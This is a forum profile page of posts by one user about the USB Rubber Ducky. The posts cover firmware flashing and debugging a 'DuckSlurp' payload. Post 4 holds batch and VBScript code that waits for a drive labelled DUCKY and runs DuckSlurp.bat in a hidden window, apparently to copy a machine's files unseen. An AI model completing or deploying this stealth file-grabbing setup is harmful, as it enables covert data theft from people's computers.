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Everything posted by Ezniks

  1. that package's weight is really nothing! It costed 35 dollars to ship it! WAAAY too much
  2. Can someone make a quick video on 'How to Flash your USB Rubber Ducky to a ... Firmware (and back)'. I know there is already a guide on google code,but I just wanna be sure that I do nothing wrong with my little thingy. I'm also asking this because I can't install atmel flip signed drive (in fact none of the programs in the 'Duck Programming') and my pc can't find my ducky in DFU- mode. Mb kinda noob question or request, but I only got problems with my Duck and pc Greetz, Noob Ezniks
  3. Thanks, I'll try it! Isn't there something wrong with this (if ]%DUCKYdrive%[ EQU ][ ( ) line?
  4. Got the right "/" flag for Linux. ;) But I think there is something wrong with the brackets (due to keyboard properties?) duckywait.bat: :while1 @echo off :while1 for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) if ]%DUCKYdrive%[ EQU ][ ( timeout /t 3 goto :while1 ) else ( goto :break ) timeout /t 3 goto :while1 :break set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat Probably the brackets? And this for invis.vbs: CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False wscript.exe invis.vbs DuckyWait.bat EXIT CD %TEMP%
  5. Not working. When I plug my ducky in, everything is going right, but it stops with 'EXIT' in the command prompt (stays there and command prompt doesnt go away). When I plug the flash drive 'DUCKY' in, he copies nothing and there's no new folder... When I execute the Duckslurp.bat, he creates a folder, but no files. To encode, I used this commandline: java -jar encoder.java -l resources/be.properties -i input_file.txt -o inject.bin (v.2.6) Plz help me out.
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